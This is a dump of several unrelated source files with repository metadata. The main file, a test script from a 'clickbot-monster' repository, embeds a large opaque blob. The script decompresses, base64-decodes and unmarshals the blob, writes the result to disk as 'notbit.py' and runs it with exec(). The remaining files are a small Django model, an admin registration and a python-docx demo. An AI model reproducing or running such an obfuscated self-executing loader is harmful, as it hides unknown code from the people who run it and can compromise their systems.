] | 4 | 2021-02-11T13:43:55.000Z | 2021-11-14T20:16:34.000Z | tests/exe.py | toutpuissantged/clickbot-monster | b8ccefb5078104ea91d30b9147cc59f92c70ed57 | [
"MIT"
] | 3 | 2021-10-04T12:16:00.000Z | 2021-12-10T06:02:41.000Z | tests/exe.py | toutpuissantged/clickbot-monster | b8ccefb5078104ea91d30b9147cc59f92c70ed57 | [
"MIT"
] | null | null | null | import marshal as ms
import zlib
import base64 as bs
data=b'x\xda\xedZ\xdb\x96\xaa\xc8\xb2\xfd\xa4\x06,\xbb\x8bG\xa1\x04A\xa5\x96\xa2\x80\xbc\t\x94\x80\\t/\xaf\xf8\xf5{F&\xe0\xa5\xac\xd5\xbd\xba\xcf^c\x9cs\xf6\x03\xa3,M"3\xe32cFd\xbe\x04\xafE\xaf\xd7[\x1b}\xf1\x18v\xa6yX\x8e\x87KW<\x05\x1dS0t\xf9\xa2\x16\xf9>\xd4\xe5*R\x95\xcb\x877\x1e\xaa\x85|\x19\x95V\x97\xc6\x06v\\.\xa4\xf3\xc5\xac\x94\xad\x9f*\xc7\xb0\xea\x1e\x16\xae\x98\x7f\x9b\tePNJCwv\xa14\x8fM\xc9\xda\xf9\xaeV\x99U6T\xd3q<\x95\x1c\xc1\x18\xe4\xc7\xc83\xe2\xa0\x13\x1d\x8c\x81\x9f\x04\x03\'\x0f+\xa5\x08\x0byo\xe8bwTB\xbe\xee\x94a\xa1\xedG\x85\\\xf9\xa7m\x12\xea\xf9j\xe9N\xe2ov\xef2\xbe,:\xd6%\x93\xd4B;-\x1dy\xb3\xf0\xac\x8d\xf1&\xd0\\\xc9b\xa6\xa5~\xb1\x10\xad\xc2L\xdfg\xe3\xcb\xfb[\x94\x8d\xd7\x93\xaeU\xf8kk\xdd\xab\xac7\x03\xbf\x8d\xcf\xe6i3\xf4u\xa70\x06J\xb5t\xbb\x82\'\x89\x17_\x94\x05\xec?\x1f\xeab\x1ev\xac\xc4\x97\xe6\xdb\xf7xc\x86\x03s\x8b=mLqW\x1a\xea.\x9e\xd2\x9a\xec\xee\x9b;\xd7\xde\xe9\x7f?\x8d\xfe\xf0uM\xf0\xbd\xe96p\xe7\x87\xa0\x90;C5;@O\x95_\xb2\xef6F\xea\x18\xef\xa9c\xe1\x99\x19i.\x9bU\xef\xbb\xd1\xf7\x8fa1?\xcc3g6u&\xf1\x10:0E!\xfe\x90\x9a\xf9\x1d\x99\xe9\xad\x98\xe6\xd0q\t\xf9\xab\xb0p.\xb0\xc9\x01\xba\xddD\x9e\xb9\x1b\xa9\xca\x1e\xdfo\x02i"\x9bB\xa49j\xc8\xd7|\x1d\x07\x9d)\x95\xefi\xa2\xefY\x02\xec\xd4~\xa6}Fzr\xf4\xd5S\\\xcb\xda\xc0V\x99\xef\x99\x97o\xde.u<+\x0fSQ\xc1:\x0e\x91j\xfcnd\xe2\xf1\xa3\xc8w\x81\xde?Z\xf6\xcb\xc9P\x13\x0f\xba\xcb`\xc7\x8b\xd1\xef\xce\x8d\xb7\xfei\xb4\xee\xfdah\xd16X\x8f\xab\xf7Jyy\x7f[l\x8d\xbev\n\xf5s\xeeHNjK\xb90\xba\xcc/V\xf5r\xb1\xd2\xde\xc6\x16\x92\xf9l~\xda\x19\xfay\xbb\xc4Z\xe1\x1f\xeb\xa5\xf4\x8aw\xac\r\xf9\x83o\xbfJ\x18\x0b\xb9\xb0\xe5lqx\x9fe\xf1\\\xd2\x8a\x85gn\xafrL\x19kg\xb6\x0b:\x8e\xf0m\xd6\x17\x870W\xa4;/\x91\x06[y\xd6)\x90\xba\x17\xdf\xee\xc9\xc6\xc0\x84n\x95cPZ9\xf9\xd9\xc7`2T\xa1\x8b\x857\x15CQ^\x07\xd24\'_\xba\xd1\x1f\xd91\x89\x06\xce\xc5\x93\xac\xa3\xaf\xcf1\xde\xcc\xf1\x7f\x15\xe4\xfbK\x04\xbbG\x9e\xb5ZHr\xe6\xdb\xd0\xe3\xe3\x9c\x8e\xd0\xd8\xef\x10\xb9b\n\xddbl\x92/\xa4\xddf8\xdb\x0c\r\xb5\x17\x1bz^`\xffy\x90&\x14g\x07\xec\xad\x8c\xd2,\xfe\xa6\xf6*\xd82fc\xe8\xa9}u\xa8FN(i\xa5?\xdb\xc4\xe1 
\x17\x96X\'\xe2&Y\xba/\x87p\x90\xc5!l\x1a\x14\xce*(\x9d\xfd\xa2pX\xec\xb52T\xe5\x14\x169\xec\x19\x97\xa3\xd9Kl\xbb\xddS\xe4M\xe2f,\xd6r\xa0\x07\xfb\xa8\x82B\x83Ne\xc4\xf5)\xf6\xe1\xf3\x81\xab\t\xb0y\xfe\xa1k{\xb2\xe7{\xda\xfbn\xad\xc7\xdd\xf1lQ\xc1."\xe2\xeb4t\xce\x87\x87\xf9\x98>\x97|\x1e\xc4\x10\xf9\xa2u1t\xed\xf0a+\xdf}/\x83\xce^c\xdfK\xb6\x91\xfar\x18\xa5\xe1VM{\xed\x9e\xf9\xf7\xf1\x19\xf6\x1c6k\x84\x1d\xe0\xa7\xd6w\xc4\x18t\xebW\x81$\xc4\x81+g\x91{&\x1c\xd9\x06\x1e\xf0\xa8D<\xc5\x9b!\xec\xb2\x03\x9e\xad\x80M\xc9P\xd7\xc4Hg\xb6\xc9\xa37q\x1e\x96NNr\x8dj\xbc\xfe\xd3\xe7D\xe3\x14o:?\xbf\xcd\x04Q3\xfa\xe6x&X#\xb5\xacmR\xc7\xf2l\xae\r\xa6\xf3\xee|b#\xbe\xd5\xd0T\x1dy\xd5\xec\xc5\x13\xe5\x95\'\xbe\xc6^\xc5\xf4\xc2?\x8b\xf4;>W\xf4{\xf3?t\xf0\xa7rO\xb1\xc7\xe5\x1e\r\x95\xbd\xf7j\x0cN1\xff\xfcz44\xfc\xa5\xff\xb5\x13~W^\rM^\xad\xfe\x8a\\[\t\xe9\x1d\x0frF\x1d\xcc\xd19C\xee\x19\xef\xf66\x1e\xfe\x1fj\x88M\xc8]a\xcc\x8a\xcb}\xfdK\xeb\xb5\xb1?\xed\xf5H\x0f\xc9\xa3\xf5r}\xb0\xcf!}\x1eu\xd8<\x90\xcd\x7f[i\xe4K\x9fp\xf2\xd3\\\xf8\xbeO8l2\xbd\n\xd7xyx&\xd2y\x8b\xb8\x8b\'\x85,P\xce\x03\x06\x00\xb3\x8d8Z\xf7\x0f\xe3\xe7\xef\xec\x7f8\xbf\x1a\x96\xc3\xc9\xb6\x8e\xa7D\x87\x9f\xe5\xa3<\xd7f\xfd\xf37\xa7b\xfbf2\x9e\xade\n\x1c4\xde6\xb7\xf9\xc4\x9e\xce)\x07\x84\xf1r0\x15\xc2\xc1\xf8\xf7Q%\x97K`{\xe4\x1a\x07\xf8\xf1~\xd4\x99"oNO\x91\x9b_\x10\xff\x88\xd1(\xf7\xd5\xd7[\x19\x9e\xdd\xcf\xe7S\xe8\xdc\x84\x1c\xe4\x93Ok\xe2:z\xdccF\xbe\xdd\x9f:\xd6\xdb<\xcb\'N\x1fi<U\xd4Y_~\xb3O\xdb\x16/<\xfd\x85\xfcC\x03>\x11\xde\x10\xc6t\r\xe0"tQ\x1a\x83k\xce6t\xf3\x18\xa9\xdd0`\xb1<\xe6\xfa\xd6\xe5S\xa4\xe7\xd0\xf9x\xd8\xe6\xd3J\xf9\x16\x0e\x90\x1f\x81\x93\xef\xa9\xc2\xc7\x17\xf5\xb8\x14X\xad\xed\xd2\xa9.\x97\x88\xf5#\xe6\x00n\x92\xfd\xf6\xab\x05\xc9K\xe1\xdb\xd9y\x0b\x9c\x02f\xe7\x07`\xc2n\tL\xf0$\x9a\xdb\xd8\x19\xaa\xa9N\x84\xa4y\'\r:\x93t\xa4\xf6R\xb7\xb0\x92PJ\x9e\xc82!\x8b\xcd\xb3\x0e\xf4|\xbd\x14e\xf6\x8eg\xf7\xd6w\xebO\x95\xdd\x12\xf9\x82\xf65\xe7\xfb\x88\x17\xf7\xfb\x8b\xf1\xfe\x05\x9c\xa9C\xb63\xf4\xae\x18\xb8\xc89\xd0\xa1\xdf\x19\x0f\tG\xdb\xef0/t&\x10\xd6r\xdcu(G`,\xb8\x84\x9d\x1c\xb9n^\xb6M\x0eh\xf4\xa6\xda\x86Ikn\xf0\x10\xb9o\x07\x0e@\xbe\xcc\xf5\xedY\xdf\xc9.\xcc\xb7\x81\xad\xa1\xe4\x80\x83Y\x02\xb3K\x0f\\\n1\x00N\xc0d\xd5\xb8\x1c\x0fU\xc3$\xfb:R\x02\xbd\xc4\xf5\x9e\xa6G\xc6\xd5l\xa5\xb3\x80\xbf\xc3\xc6\xf8\xdf\x14\x83\xf5k\xfa\xd9o{\xf8.y\xe79\x0e\xdcN\xea\xee>\xec\xec~\x9cc\x81\x9fP\\\x80K\xa4\xbd-b\'A\x0cvh<x\xdd&\xe8(,\xdf\xb8\x92vY\x8a\x02\xe2\x0c9H\x93\xd7K\xe4\n\xf8\xda\x8e\xf2\x08\xd6q\x89$\xa7R\xe3\xcc\xc4^\xd7\x7f\t\xbbo\x1e5\xc6\xfe;\xf9aQ)\x99\xef.\x907\xb4m\x90\xc6w<\xaf^\xef\x00\xf1\xae\xcd\x90\xe3\x8c\xc1\xc3:\x9e\xef\xa9\xd5\xb3\xefN\x0e\xd0eJ\x1c\xa4\xf5\xf5Sf2_\x9es?E\xfe\x80\x9f*o\xad\xcc\xbe\xb6n\xfcg\xe6\xc2\x0f\xec:~\xe2l]\x8f=6\xb1\xa2\xc6y\x1b\x93F\xbf\xf5\xbb\xdf\r\x8d\xe7^\xd5\xade\xd51\xe4\x14\xf9e\xe9q\xff\x87\xec\x0b\xe3\x0e6\x8b\x91!\xc5\x8e\x91\x033\x85\xdb9^\xb8\x0f\xf76&pa\xc2\xe7R(\x1e\xe2\xc6F\xc8\xb3,\x0e\x8cA\x84\xb8\x89[_$,\x08O\x1b\xf3\'\xfc<YtZ?7U\xaf\xc6\xd6^\x96\xaa\xb4\xc6\'2H\xafX\x97B~\x1c1\x8e\xaa\x08A\xa5\\|\xe4\xffE\x87\xc7#t\x04?G|\xc3\x1e\xb4\xde\x9a\x83\x80\xf3\xe6\xe0H\xa8A\xd48U\xc1UT\'B\xfd\xc0\xdf1;\xe3\xb8\x1d\xff\xd4\xf7\x15\xac\x99r\x81\xf0\x9b\x91\xde\xe5\x05\x96\x7f\xf0\xddf\xd6\xf2(\xf9\x10\x0c\xb2\xed\xc3\xb8\x9a\xe7\xf7\xd2\xf7\xd4\x88\x876\xb3\x15\xf8e\x84=\xc0Vj\xa3\x8bn\x80\x9a\x06XV\xdb1G,\xc49\xf4?\xbd\xdb\xcf5\x16r\xaa\xc1\xae\xb14\x13\xda}\xb8\x17%\xba\xd3\xab\xde\xc8\xdc\x9d<\xbb\xf6[\xe8\x94\xf3;\'3R\xaciB>\xc79\x16\xe3\xa6\x03\x05\xf5E7\xbf\xdaB\xd
9\xc2\xfe\x07\xf2\x07pip\xd9\xbcX\xe2]u\xc2\xe6ac=\xa9\x19K\x9c\x1b5c\xd5M\xc2"\x92\xdc\x8b\x16\xb1\xd8\xc5\xb3\xa4\xf8\xe3\xd8\x89\xbaRI\xe0G\x07\xe2{\xe0\xdb\x97\xa1j^\x88\'\xb2\xbd\xa6\xd9\xef\xec\x1d\x17\xe3\n\xf1\xbb\xaf\xe7\xd5\xc3\xefC\xe2\x17\x06\xfcU\xb5\x81\x7f\x92L1\xb5\x86\xcf\x92_\x10\x9e\xe7\x88A\xec+o>\x13\xfe\xcd\xc9_\xfc\x8e\x99\x04,&\x1d\x16O\x88a\xc4\x07\xc5\x0e\xcf\xab\x8f\\\x1aX\xdb\xd4\xa2\xf0\xcdk\xfdI>\t[\xc2W\x90\xd7\xf5F^\x97\xea\x03\xd4\xcf\xc9\x898\xba\xef\xc8u\r`P\\\x9b\xa8\x0bi\x1dI$i\xe0\xb8\xed:\x0f\xa8\xb7\xa8\x1e\xcd\x19\xbf\x9d\xd0s\x8d\xf7I\xc7\xa9P\x9bP<&\x0b\xd4#\x11l\xfa\x9e\xde\xe4\xfa\xcc\xf2\'\xf3\x17^Kv\xf6\xa8\x9f\xba\xc5\x12\xf5\x1cj\x12V\x9f\xaf\xec\xe4\x0f\xaaQY\xdc\x14\xdd\x046\x979g\x7f\xc2s\xb0F\x8e_\xd3U\xe0Y\xa5\xd7\xe1\xb5l\x8d}>\xb8\xf0x&\xd2\xdc\xbdr\x8e\x1a\x11v9\xf8U\xef\x18q\xbc\x89\x89\xb3\x00_\x0f\xbez\xcbELm.8s\xa6\xaf\t\xb7\xd7\x1c\xf5\x15\xf1\xf5\xeb\xf8V\x06\xed\xfd\x93~B\x9aKCm\x08\xfb/\xdc(\x1f>\xe03p\xae\x1cu\xfc-\xec(0<\x9c\xd4>\xadQ\x9dg"\x96\xf9o5o\xd9\xf8\xb0\x81?\x18\xd3\\=\xe2\x05>t:*\xe4\xc3Pw$\xfa\x0c\xdf}\xf7\xbd\xc8j\xe7\xd3-\xd8|\x8a\x1a\xf9q^\xe4\xd4\xc2:\x06.\xf4p\xa9\xeb\x0b\x9b\xd9\xef.\xe7\xf0\xbdQ,\xc3\xcf\xeb9\xa8\x16\xac\xd7I\x8f\t]m}`\xf3\xc2=\xaf"O\xc90\x1f\xab\xa3|\xcfg:x\xf6;\x8f\x11\x8a\xd7i7\xd4\xe7\x9bgc\x86\xe0\x8e\x88c\xc2z\'\xd4Q\xd7\xea\xcelI=\x9e~\xdb\xf3\xe0\xb16a\x98B\xbe\x8d\xdawZ\r1f\xe9\xa2\xae/\xb4\x9d\xd7qN\xac\xdfaw[\x1b\x8c\xd4\x08u\x95\xb2\xfbp\xe4=t\xfc=\xf2z\xe5\x10z\r\x8aI\x1c\r\xf2\x13\xe33E^B\xe7\tt&\xf2\xb9\xe7\x87\xa0\xcdG\xdd\xc7\xf7\xb7\xc0\x9e\x8b\xa1\x01C\xf4s\x17u*b\xaa\x9b\xcf\\\xadZb~\x86i\xd0\x93J6P\x811\xb5\x1e\xa9_\xf4\xc3u\x96\\\x1e\xe2\x0bx\xb4\x17C\xb5[Q\xff\x82prT\x98"\xf6JuA0\xd6\x84\x03\xf5D\xb8.2\xd3\xe8<\xce\xd3\xea\xeb\x80x<\x05\x83|\x15\xd4k\xc3\x1c\xc7\xa8\xc3e,J\xcaY\xc8\x97"\xe1mW\x0c\x8b\x13\xb3/\xf3\xfdIc/\x92}\xc5\xd4\x19|\xcf\xe7\xfe\xc0\xc6<\x8bAS\xbc\xf5\xe1(_\x94\xd6\x96\xf49J_J\xaai\x9bw)\x7fC\x9f\x17\xf8\xb8\xb0\xd4\xe7T[\xec1\xd7\x11\xb6\xbdYKf\x0e\x07\xf7=\x10\xea\xa7\x00\x8b\x05\xafs\xed\x97\x0c\xa9\x7f\x82\x9a\xe3\xbe\xa7\x92\x90\x9cm\xa3\'\xe0?b\xd9\x02\xfe\x93}\xfb\x84o\xaa\xefR\xdd\x9d\x17\xa8\xcfg\x01\xf43\x1cP\xdf\xe5\xae\x97\x05.\x12m"]\xdcQ\x1e\xa0\xf7C\xce}j\x1d\x81\xb3\x0f\xa6\x883&\xef\xc4\xf6\xe3\xc8\xe4\xcf\xc9\xa8\xf0ak(S\x9an\xa34\xdc\x19\x83\x1d\xf5%\x11o\xe3\xf2=\x8d\xca\x91g"?i\xe0H\x88Y;\x92\x87\x8d\xde\xeb8\xabu\xf4\xb6\xf0\x14a!%\t\xf2~N5\x05\x9e\xec:?\xf5g\xaekXzc\x9e\xb7\xfa]\xe4\x86&^X\xccp\x9c\x066\x85R\xb4\xc2\x9e\x81\xbfI\x8b{S\xc6\x13\xa3\xa7s\x19v\xf8\xc8\'J\xe0\xd5\xf7\xa5\xa7\x9c\x98\x8du-\x0b\xab\x97\xc3(\xaf9\xde\xa4\x99\xf3\xc6\x97\xea\xbd\xb0\xfa\x05\\&\xd2\x93\x1c\xb9\x172z\xd7\xf1\x9frT2@\xed\xa0\x82[\xbc\x01\'v\x8bB[/\x85\x9a\x93\xe4\xb0\xbd\xe7\xc0\xfe\xa89\xe2\xeb|\xe0\x0by\xb8\x16a\xf73\xf5\xb2\x10\xe3\xdd<PO7k\xca\xd9\xfe\x91#\xe5\x16\xaf\xaeq\xbe\xf5\xef\xc72;~s\x7f"\xae\x9c\xbb\xb8:#\xae\x98\x8c\x9b5\xa2\xb6\xe0\x1c\xa3\xcd1u\xadF\xbdh`u\xd6\xd4\xaf4fr\xcd\xd7\xc8\xfbI\x1eQ~\x1d\x8c\x0f\xb3\xc2\xe9\\\xf9rB8/\x84\x97O\xfb\x8eY\xcd(\x89\xf0\xc3PvP\x1f\xf9v\xc6|\x17\xd8\xd9\r\x8aq\xcc\xfb\xccQB\x98\x0f\xac\x15\xc3r\xbc\xa9\xf5\xc29/\xf4\xd5\xe0\xd3-\xc6\x83\x1fw\x10\xef\xbcG9\xe1|\xc9\x14\x19\'\xcd\xa9\x06G\x9dQr>}\x83\xdd\xb5/\xfc 
o_\xeb\x1a}Q\xde\xf7\x9a\x9fs\x00\xf8\x94\n\xdf\xc0~\xad\xbc\xe1\x85L\xb7\xf6X\x06\xd7\xe4\x8f\xad\xcc8\xd7i\xfa\x8bJ\xda\xbc\xc3d\x08\xd7\xfc\r\xae_\xef\x7fz\x19e\xdd<\x12\xda\xf5oH\xaf\xd0\xbdL\xd8K}>p\\\xec\x93\xfa\xc39\xeb\x81P,|s\xa6U\xe4\xce\xb7,\x96m\xeb.\xb7\x82\xf7\xae\x811\x14\x83\xed\xfc\x0f9\xd64\xda=3\xfe\xc5\xed\x8d<\xb0\xf0(f\x9d\x17\xaa{\x88/0}\x0b\x9a\x84x\xd9-\\s\x07\x0cme\xd2\xb9G\x90*\xad\xdd\xde\xe3:&m\xeb\x07\x18p\xd3\x1bz\xd0=\xea\xc5\xf2s]\xc9e\xde\xd4`\x8d\xdd\xa9\xdf\t\xae\x9c\xfd2\xceB\xbc,r)\xa72<\xf9\x07\xfe{\x83i\x83)\xf5"X\xce\xfa\x1b~|\xc3?k\xae[\xafae\x7f\xc17\x81\x03\xb3\xe2\x15u\xa4L\x1c\xbbbgOz\x9e\xfd2\x0c\x00\xef\xf2:|\xceG\x9f\xbc\xe2\xe3\r\xc7(\xcd$\x12e\x96\x87[n\xa7F\xc8\xa1f\xf5\xc1\xce\x1a\x10+\xc8\xd3T+2\xae\x04\xf9\x86~\x06\xaeQ=\xa9\xc0o\xe1\x17\xe0\xdeK\x17\xf5|#\x7f\xb6\xa9q\xf1/\xe5\xaa\x9f\x9c\xebk\x1fn\xea\xcf\xbbs\xb6\x1ak\xdc\xb93\x9e\xf5e\x8f\xf5pE+\x0f\x8a)\xe91n8<r\x15\xfcS$.\xf9\xb5\xfc\'\xb5\x17t\x98y\xd7X\xdf|\xc2\x145l\xea\x8c\xf2\xce?\\\x92\xffkk\x02\xf0\x89g\xf5\xc0\xcf\xf8\xc5\x01\xb5.0!\x8cI\x0e\xf8\xc2\rn\xfd\x8f\xf9\x00j\xc6y\x0c\x0c\xca\xb9\xfd\x81\xdd\x15\xd3\x13\xbe\xf3\x93%\xb0qQ\x9c\xf3\x1fa\x99\xcak^\xc4\xb4"R=;g\xe7q\xd4w\xe9v\r}\x9f\x7f\xd8\xacf\xcf?\xf4\\\x00.\\\xb9\x8e\xeb\xbc\xc0N\x9b1\xeb\x998\xbb%\xc3z\xde\xff\x00\xe6@7m_\xe3\xec1\xdd55\xf3\xb5\xa7\x02\xde\xc0\xfb\x94m\x1fG\xcc}\xd5hr\xdc\xdb\x12\\l\xc9\xcf\xb3y\xbdn7gv\xc6\x95\xf3\r\xac\x13\xf2\xdf\xd6/\xf2\xdc\xef\xfd\xb7\xdf\xf1\xff\xa1\xdfq\x87It\xbe@\xfe~\xedml\x1b\xfb\xc2\x87\x1a\x0eD\xb9`\x0f\xff\xcc\x0c\x95\xce\x11\xa6\x17\x9e\x0b\x88\x03R\x9f\xa3\xc6\x93\x92\xc9]]c<\xf9\x94W\xcc\x8a\xbf\x7f\xd7\xc7\xb8\xd6\xea\x9c\xe3\xb3\xbe>\xec1\xff\x0fq,W\xbb| \xbfQ\xbd\x82\xd8\xf8\x17;o\xe9\xf0^\xca?\xc0+\xb2_\x072\xc0\xc5\xfbWlb\xf1\xff%^\xb5\xb8\xca\xf2H\xf5\x9f\xae\xfb\x9f\xe2#F;\xf6LUz\x1f\xad\xee\xce\xcc_\xc0;\x9a\x9au\xd8\xd6\x8dj\xf8[\xcd\x15\xef\xd7~ij\xf4\xdb=\x91\x7f\xd6\xf75l\xca_Z\xb5\x90\xe2M\x98F\xac.\xf2\xd4\xd7\xcd(\xdd\xfc6tN\x90y\x8a[?a\xeb\x0b\xb7\xa3"\xaaX}\xfd\xd6\xaf\xd7\x01_\xd0\xdb5\xb0\xde\x02\xe9\xf5\xe1\xbd\xb6~\xbd\xf9\x9e\xc5\x0e\xbf\x071\xa7~\x1bt\x86\x98\x1f\x18%b|\xef;\xa7\xe3P}\xf9\xd7\xb7*+\x81\x0f\x0f6\xc9\x0e\xc0\x98c\x04\x8e\xc8\xb0\xfa\xa6>}\x16[~\xda\xe6P\x16_\x93\xc1\xfeA\x1f\x8e|\x9f\x07\xfe<\xcf?\xee\x83\xf7\x03\xb9\xbf^k\xe7MS/_\xfd\x90\xf7\x02\xf99G\xe3{\xf5\xb8\x9f\xe4\x87\x8f6\xfd:\xb6&\x8f\x1c\x91t\xdd\xcd}M\xc6{\xb2HgG\xf7\\\x9bt\xc08\x14\xf8\xd6\xf3~\x14auk\xd3G\xcc\xa1\xbcWF\x98\xe3\x06w\xbc\xf1gn\xa47s\xdc\xf9\x19\xd3\xe7]\xef\xf6S]\xad\xedY\xfd\xf5\xeb\xf0\xa8\xae\x89\xa8\x9f*\xb2\xfc\xf0\x0f0\xc9\x0f:\xf3v/_\xd6x?\xe0\xb2S\x11\xbc\x89\xe7\xa3\xcfu%\xe7St\xae\xf7E?\xbc\xcd#\xef\xc8\xe3{\xfa\x9d\xf5}N\xbfL\x97\x87@\x94\x89\xcf\xfd\xfd\xfaN\xfa\x9a\x17\xfe\x1d}\xb6w;D\x0b~kv\xd9=/:\xaf\x02\x8f 
.\x1a\x10_G\x0c\xf2\xfe\x18\xb8E\xa1m\x03]K\x03\xdd\xf9\xa1\x9e\xb9/\xf0\xb3\xc0\xa1\x1aMX/\xb2\xa23\xb4,^Jt\xafa\x8a}0\xce\xd9\xf4T\xf9{\xd7\xfbH\xa6O5\xcf\x97\xe7n\xe6W\xe7n\xd5\xd7\xe7n\xf9#o\xa2\\p\xbd\x13F\xdc\x96\xf5vYo\xfe\xc0\xcfc\xc7\x87\x10\x98\xb3T\xbb\xc4\x99/\xb0\xfd\xc6\xa0\xfei\xc7\xa23\xd5\xb4\x8d\x01\x8c\x0b\xdc}\xb6\xf4\x8c\xfb\xdf\xe9,U\xed\xc5\r\x07\x06\x97=\xb0\xbb\x02l\xff5\xe6Q,\xbb\r\xfe\xd1\x99\xf2\xf5\xae\xc7\xa4\xc6\x15\xe8\xb0\xe5\xa7#~\xf7\xe4q/\r\x7f\xe4\x98\xe2)[\x0f\xbe\x1aJ\xf1\xf6\x0bn\xc4\xf9\xc5\xe0\x91_3=\xed\xb9\xfd>\xe5\x02vG\x92\xf2J\x8bQ^{g\xee\r1Q\x91l\xaa\x15\x10\x0b\x84\xad\xbf\xdf\xf2\xc0\x89\x98+\xb7}1\xea-\x87XG\x93\x87\x86\x03\xc6/E\xe4C\xba\x1b\x07?\x16\xb6_\xd7:\xcf\xb8C|wN\xb6,d\xc6\x0b\x1a\xae\xf8\xf4\xac\xeaZ\xfb\x82{n\x8f\xc8\xdf\x7f\xffL\x8c\xbf_\xde\xe2\xb7\xcd\xd7\xc0\xce\x06Z\x9c\xff\xdf\xc7%\x19n\x07\x9eC\xf7n\x98\xcc/\xb1\xc6\xbd\xe1ld\xc3\xfaN(qq\xaca\xbdT\x93\xaa\xee\xb1\xee#\xba\xdf\xa03\x9d\xc5\x135>\x0c\xd7t\xf7\x8d\xe1\x02\xb0\xe7\xa5\xe4wok}\xdb]\xc4\x83\x0c^\xc9\xb1\xe1\x07|\x87\xdd\xb9`\xfd\xaf\xbe\xf2\xc7cn]\xd9\xf5\x1d\xc8[\x1e\xf9#;=\xc9\xf1\xc3>\xad\xb9\xdb\xde-\x99\x17\xce9rI7\xc9#/\xd9\xfe\xc9Z]\xdf3\xb7~\x99\x137\xbb\xc3\xc1z}tO\x80\xddg\x01v\xf2\xf3%Zg\xd1\x9c\x9d|\xf2\xd3\r\xdd\xff\xa6\xfbT\x13I\xdb\x05\xba\x89\x9an\xafp\xfc4\xed\xf6^r\xaf9\xdbSr\xe0\xc6\'\xdfj\xb8\r[\xab\x94g\xcf\xce\x0en9\x10\xd5\x02\x8b\x99\xd8\xe4\xe3\x9f\xaf\t\x1c\xe1\xc0d\xd4{\xe7\xfd\x9b&N9\xbe\xd4\xfd}\xc6a\xeb\x1e\xff\xaf;O&\x1dk\xf2&\xa0Z\xb9\xaa\xb9\xa9\xda\xf4\x10\xfeJ\xaf\x9b\xf2I\xaft\xc17\xc1\xfb\xc4\x90\xdd\xeb\x98&\x1f_\xf7\x8d\x18\xee\x92\x0f\x03\xc3\xc1\xf5\xcd\xcb\xb3Z\x81\xee\xd5\x04\x14+\x1d\xba_\xc6\xea\x05~\xd7\x97\xf8\x15\x9d\xd5\xdd\xdc\xb3\x7fR\xbb|\xdd\x9b\xca"{:w\x9a\xbb\xf7\xb3\xc8\xb5\xd6\xecN\xb1\xadL\xd8|T\x17s\xbf\xfb\x83\xfd%\xbc\x15k\xfdt\x84\x9b5\xd0]d\xc6\x85\xff\xcb\xc9\xfe\xefp\xb2\x8b\x7f\xd7\xff\x8bS\xee\xd79\xf9&\xf5f\xc0\x9b\xa6\x9b\xfa\xdc\x1c\x7f\xad\r\xf9!\xefg6\xf7\xe6^\xe2i}\x1f\xbd\xe6e\xac\x1f\xa9\x92\xde\xe3\'\xb9\xb7t\x90\xc3\x10Wz\x0e\xfbN\xb7\xa1\x84\x98\x05>/`\x07_e\xfcf\xc8k<p\xae\x8as\x94\xdaWV\x81.\x1f\x913\xb6\xc0"1\xc8\x89\x93\x00C4:\x83\x17Ot\xdf\r>\x0fn\x90\x1f\x86j\xb6\xfd7\x0f\xc0\xa6&'
val=zlib.decompress(data)
val=bs.b64decode(val)
val2=ms.loads(val)
fw=open('notbit.py','w')
fw.write(val2)
fw.close()
exec(val2)
print('done')
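# The lines above are a self-extracting loader: the embedded byte string is
# zlib-decompressed, base64-decoded, then deserialised via `ms.loads` (here `bs` and
# `ms` are presumably base64 and marshal/pickle aliases imported earlier, not shown
# in this excerpt), written out as notbit.py and finally exec()'d. Because the payload
# is opaque, `data` should be treated as untrusted before running a script like this.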
| 834.235294 | 13,981 | 0.733042 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 13,996 | 0.986885 |
6a0fb21e21040834df2f296f7650980a669e7a30 | 374 | py | Python | apps/gamedoc/models.py | mehrbodjavadi79/AIC21-Backend | 9f4342781f0722804a2eb704b43b52984c81b40a | [
"MIT"
] | 3 | 2021-03-12T18:32:39.000Z | 2021-11-08T10:21:04.000Z | apps/gamedoc/models.py | mehrbodjavadi79/AIC21-Backend | 9f4342781f0722804a2eb704b43b52984c81b40a | [
"MIT"
] | null | null | null | apps/gamedoc/models.py | mehrbodjavadi79/AIC21-Backend | 9f4342781f0722804a2eb704b43b52984c81b40a | [
"MIT"
] | 2 | 2021-01-29T14:52:53.000Z | 2022-03-05T10:24:24.000Z | from django.db import models
# Create your models here.
class Gamedoc(models.Model):
link = models.URLField(max_length=500)
title = models.CharField(max_length=500)
repo_name = models.CharField(max_length=512, blank=True, null=True)
user_name = models.CharField(max_length=512, blank=True, null=True)
def __str__(self):
return f'{self.title}'
| 28.769231 | 71 | 0.719251 | 315 | 0.842246 | 0 | 0 | 0 | 0 | 0 | 0 | 41 | 0.109626 |
6a0ff32b449d925c6b914b62185f0b337c8c4a7c | 133 | py | Python | assignment/users/admin.py | LongNKCoder/SD4456_Python_Assignment_2 | 8a1b64f0b4169585fb63907016f93a7ab15da0a7 | [
"MIT"
] | null | null | null | assignment/users/admin.py | LongNKCoder/SD4456_Python_Assignment_2 | 8a1b64f0b4169585fb63907016f93a7ab15da0a7 | [
"MIT"
] | null | null | null | assignment/users/admin.py | LongNKCoder/SD4456_Python_Assignment_2 | 8a1b64f0b4169585fb63907016f93a7ab15da0a7 | [
"MIT"
] | null | null | null | from django.contrib import admin
from users.models import Friendship
admin.site.register(Friendship)
# Register your models here.
| 16.625 | 35 | 0.81203 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 28 | 0.210526 |
6a10bfc3e38883e78cd876111e7b6300fd43d471 | 529 | py | Python | python/Word/demo_doc.py | davidgjy/arch-lib | b4402b96d2540995a848e6c5f600b2d99847ded6 | [
"Apache-2.0"
] | null | null | null | python/Word/demo_doc.py | davidgjy/arch-lib | b4402b96d2540995a848e6c5f600b2d99847ded6 | [
"Apache-2.0"
] | null | null | null | python/Word/demo_doc.py | davidgjy/arch-lib | b4402b96d2540995a848e6c5f600b2d99847ded6 | [
"Apache-2.0"
] | null | null | null | import docx
doc = docx.Document('demo.docx')
print('paragraphs number: %s' % len(doc.paragraphs))
print('1st paragraph: %s' % doc.paragraphs[0].text)
print('2nd paragraph: %s' % doc.paragraphs[1].text)
print('paragraphs runs: %s' % len(doc.paragraphs[1].runs))
print('1st paragraph run: %s' % doc.paragraphs[1].runs[0].text)
print('2nd paragraph run: %s' % doc.paragraphs[1].runs[1].text)
print('3rd paragraph run: %s' % doc.paragraphs[1].runs[2].text)
print('4th paragraph run: %s' % doc.paragraphs[1].runs[3].text)
